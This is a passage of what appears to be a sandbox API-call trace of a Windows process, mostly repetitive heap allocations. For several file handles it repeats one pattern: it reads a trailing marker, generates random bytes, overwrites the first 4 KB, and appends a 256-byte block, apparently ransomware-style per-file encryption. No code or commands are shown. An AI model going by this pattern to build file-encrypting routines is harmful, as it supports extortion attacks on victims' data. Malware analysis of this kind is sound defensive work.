| out: hHeap=0x4f10000) returned 1 [0080.128] GetProcessHeap () returned 0x4f10000 [0080.128] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0080.128] GetProcessHeap () returned 0x4f10000 [0080.128] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.128] GetProcessHeap () returned 0x4f10000 [0080.128] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.128] GetProcessHeap () returned 0x4f10000 [0080.128] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0080.128] GetProcessHeap () returned 0x4f10000 [0080.128] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0080.128] GetProcessHeap () returned 0x4f10000 [0080.128] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.128] GetProcessHeap () returned 0x4f10000 [0080.128] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.128] GetProcessHeap () returned 0x4f10000 [0080.128] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0080.128] GetProcessHeap () returned 0x4f10000 [0080.128] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0080.128] GetProcessHeap () returned 0x4f10000 [0080.128] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.129] GetProcessHeap () returned 0x4f10000 [0080.129] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.129] GetProcessHeap () returned 0x4f10000 [0080.129] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0080.129] GetProcessHeap () returned 0x4f10000 [0080.129] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0080.129] GetProcessHeap () returned 0x4f10000 [0080.129] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.129] GetProcessHeap () returned 0x4f10000 [0080.129] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.129] GetProcessHeap () returned 0x4f10000 [0080.129] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0080.129] GetProcessHeap () returned 0x4f10000 [0080.129] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0080.129] GetProcessHeap () returned 0x4f10000 [0080.129] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.129] GetProcessHeap () returned 0x4f10000 [0080.129] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.129] GetProcessHeap () returned 0x4f10000 [0080.129] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0080.129] GetProcessHeap () returned 0x4f10000 [0080.129] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0080.129] GetProcessHeap () returned 0x4f10000 [0080.129] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.129] GetProcessHeap () returned 0x4f10000 [0080.129] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0080.129] GetProcessHeap () returned 0x4f10000 [0080.129] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0080.129] GetProcessHeap () returned 0x4f10000 [0080.129] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0080.130] GetProcessHeap () returned 0x4f10000 [0080.130] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0080.130] SetFilePointerEx (in: hFile=0x848, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.130] WriteFile (in: hFile=0x848, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0080.130] WriteFile (in: hFile=0x848, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0080.130] GetProcessHeap () returned 0x4f10000 [0080.130] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0080.130] GetProcessHeap () returned 0x4f10000 [0080.130] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0080.130] GetProcessHeap () returned 0x4f10000 [0080.130] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0080.130] CloseHandle (hObject=0x848) returned 1 [0080.131] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 51 [0080.131] SetFilePointerEx (in: hFile=0x84c, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.132] ReadFile (in: hFile=0x84c, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0080.132] SetFilePointerEx (in: hFile=0x84c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.132] GetProcessHeap () returned 0x4f10000 [0080.132] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0080.132] GetProcessHeap () returned 0x4f10000 [0080.132] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0080.132] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0080.132] GetProcessHeap () returned 0x4f10000 [0080.132] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0080.132] ReadFile (in: hFile=0x84c, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0080.182] SetFilePointerEx (in: hFile=0x84c, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.182] WriteFile (in: hFile=0x84c, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0080.182] GetProcessHeap () returned 0x4f10000 [0080.182] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0080.182] GetProcessHeap () returned 0x4f10000 [0080.182] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0080.182] GetProcessHeap () returned 0x4f10000 [0080.182] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0080.182] GetProcessHeap () returned 0x4f10000 [0080.182] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0080.182] GetProcessHeap () returned 0x4f10000 [0080.182] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0080.182] GetProcessHeap () returned 0x4f10000 [0080.182] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0080.182] GetProcessHeap () returned 0x4f10000 [0080.182] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.183] GetProcessHeap () returned 0x4f10000 [0080.183] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.183] GetProcessHeap () returned 0x4f10000 [0080.183] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.183] GetProcessHeap () returned 0x4f10000 [0080.183] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.183] GetProcessHeap () returned 0x4f10000 [0080.183] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.183] GetProcessHeap () returned 0x4f10000 [0080.183] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.183] GetProcessHeap () returned 0x4f10000 [0080.183] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.183] GetProcessHeap () returned 0x4f10000 [0080.183] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.183] GetProcessHeap () returned 0x4f10000 [0080.183] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.183] GetProcessHeap () returned 0x4f10000 [0080.183] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.183] GetProcessHeap () returned 0x4f10000 [0080.183] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.183] GetProcessHeap () returned 0x4f10000 [0080.183] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.183] GetProcessHeap () returned 0x4f10000 [0080.183] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.183] GetProcessHeap () returned 0x4f10000 [0080.183] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.183] GetProcessHeap () returned 0x4f10000 [0080.183] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.183] GetProcessHeap () returned 0x4f10000 [0080.183] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.183] GetProcessHeap () returned 0x4f10000 [0080.183] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.183] GetProcessHeap () returned 0x4f10000 [0080.183] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.183] GetProcessHeap () returned 0x4f10000 [0080.183] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.183] GetProcessHeap () returned 0x4f10000 [0080.183] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.184] GetProcessHeap () returned 0x4f10000 [0080.184] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.184] GetProcessHeap () returned 0x4f10000 [0080.184] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.184] GetProcessHeap () returned 0x4f10000 [0080.184] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.184] GetProcessHeap () returned 0x4f10000 [0080.184] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.184] GetProcessHeap () returned 0x4f10000 [0080.184] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.184] GetProcessHeap () returned 0x4f10000 [0080.184] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.184] GetProcessHeap () returned 0x4f10000 [0080.184] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.184] GetProcessHeap () returned 0x4f10000 [0080.184] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.184] GetProcessHeap () returned 0x4f10000 [0080.184] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.184] GetProcessHeap () returned 0x4f10000 [0080.184] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.184] GetProcessHeap () returned 0x4f10000 [0080.184] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.184] GetProcessHeap () returned 0x4f10000 [0080.184] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.184] GetProcessHeap () returned 0x4f10000 [0080.184] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0080.184] GetProcessHeap () returned 0x4f10000 [0080.184] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.184] GetProcessHeap () returned 0x4f10000 [0080.184] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0080.184] GetProcessHeap () returned 0x4f10000 [0080.184] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0080.184] GetProcessHeap () returned 0x4f10000 [0080.184] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0080.184] GetProcessHeap () returned 0x4f10000 [0080.184] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0080.184] GetProcessHeap () returned 0x4f10000 [0080.184] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0080.185] GetProcessHeap () returned 0x4f10000 [0080.185] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0080.185] GetProcessHeap () returned 0x4f10000 [0080.185] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.185] GetProcessHeap () returned 0x4f10000 [0080.185] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0080.185] GetProcessHeap () returned 0x4f10000 [0080.185] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0080.185] GetProcessHeap () returned 0x4f10000 [0080.185] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.185] GetProcessHeap () returned 0x4f10000 [0080.185] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.185] GetProcessHeap () returned 0x4f10000 [0080.185] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0080.185] GetProcessHeap () returned 0x4f10000 [0080.185] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0080.185] GetProcessHeap () returned 0x4f10000 [0080.185] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.185] GetProcessHeap () returned 0x4f10000 [0080.185] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.185] GetProcessHeap () returned 0x4f10000 [0080.185] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0080.185] GetProcessHeap () returned 0x4f10000 [0080.185] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0080.185] GetProcessHeap () returned 0x4f10000 [0080.185] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.185] GetProcessHeap () returned 0x4f10000 [0080.185] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.185] GetProcessHeap () returned 0x4f10000 [0080.185] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0080.186] GetProcessHeap () returned 0x4f10000 [0080.186] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0080.186] GetProcessHeap () returned 0x4f10000 [0080.186] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.186] GetProcessHeap () returned 0x4f10000 [0080.186] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.186] GetProcessHeap () returned 0x4f10000 [0080.186] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0080.186] GetProcessHeap () returned 0x4f10000 [0080.186] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0080.186] GetProcessHeap () returned 0x4f10000 [0080.186] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.186] GetProcessHeap () returned 0x4f10000 [0080.186] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.186] GetProcessHeap () returned 0x4f10000 [0080.186] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0080.186] GetProcessHeap () returned 0x4f10000 [0080.186] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0080.186] GetProcessHeap () returned 0x4f10000 [0080.186] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.186] GetProcessHeap () returned 0x4f10000 [0080.186] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0080.186] GetProcessHeap () returned 0x4f10000 [0080.186] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0080.186] GetProcessHeap () returned 0x4f10000 [0080.186] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0080.186] GetProcessHeap () returned 0x4f10000 [0080.186] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0080.187] GetProcessHeap () returned 0x4f10000 [0080.187] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0080.187] GetProcessHeap () returned 0x4f10000 [0080.187] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0080.187] GetProcessHeap () returned 0x4f10000 [0080.187] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0080.187] GetProcessHeap () returned 0x4f10000 [0080.187] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0080.187] SetFilePointerEx (in: hFile=0x84c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.187] WriteFile (in: hFile=0x84c, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0080.187] WriteFile (in: hFile=0x84c, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0080.187] GetProcessHeap () returned 0x4f10000 [0080.187] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0080.187] GetProcessHeap () returned 0x4f10000 [0080.187] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0080.187] GetProcessHeap () returned 0x4f10000 [0080.187] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0080.187] CloseHandle (hObject=0x84c) returned 1 [0080.198] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 52 [0080.198] SetFilePointerEx (in: hFile=0x850, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.198] ReadFile (in: hFile=0x850, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0080.198] SetFilePointerEx (in: hFile=0x850, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.198] GetProcessHeap () returned 0x4f10000 [0080.198] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0080.198] GetProcessHeap () returned 0x4f10000 [0080.198] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0080.198] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0080.198] GetProcessHeap () returned 0x4f10000 [0080.198] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0080.198] ReadFile (in: hFile=0x850, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0080.251] SetFilePointerEx (in: hFile=0x850, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.251] WriteFile (in: hFile=0x850, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0080.251] GetProcessHeap () returned 0x4f10000 [0080.251] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0080.251] GetProcessHeap () returned 0x4f10000 [0080.251] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0080.251] GetProcessHeap () returned 0x4f10000 [0080.251] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0080.251] GetProcessHeap () returned 0x4f10000 [0080.252] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0080.252] GetProcessHeap () returned 0x4f10000 [0080.252] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0080.252] GetProcessHeap () returned 0x4f10000 [0080.252] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0080.252] GetProcessHeap () returned 0x4f10000 [0080.252] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.252] GetProcessHeap () returned 0x4f10000 [0080.252] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.252] GetProcessHeap () returned 0x4f10000 [0080.252] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.252] GetProcessHeap () returned 0x4f10000 [0080.252] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.252] GetProcessHeap () returned 0x4f10000 [0080.252] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.252] GetProcessHeap () returned 0x4f10000 [0080.252] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.252] GetProcessHeap () returned 0x4f10000 [0080.252] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.252] GetProcessHeap () returned 0x4f10000 [0080.252] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.252] GetProcessHeap () returned 0x4f10000 [0080.252] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.252] GetProcessHeap () returned 0x4f10000 [0080.252] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.252] GetProcessHeap () returned 0x4f10000 [0080.252] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.252] GetProcessHeap () returned 0x4f10000 [0080.252] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.252] GetProcessHeap () returned 0x4f10000 [0080.252] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.252] GetProcessHeap () returned 0x4f10000 [0080.252] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.252] GetProcessHeap () returned 0x4f10000 [0080.252] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.252] GetProcessHeap () returned 0x4f10000 [0080.252] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0080.252] GetProcessHeap () returned 0x4f10000 [0080.253] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0080.253] GetProcessHeap () returned 0x4f10000 [0080.253] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0080.253] GetProcessHeap () returned 0x4f10000 [0080.253] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0080.253] GetProcessHeap () returned 0x4f10000 [0080.253] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 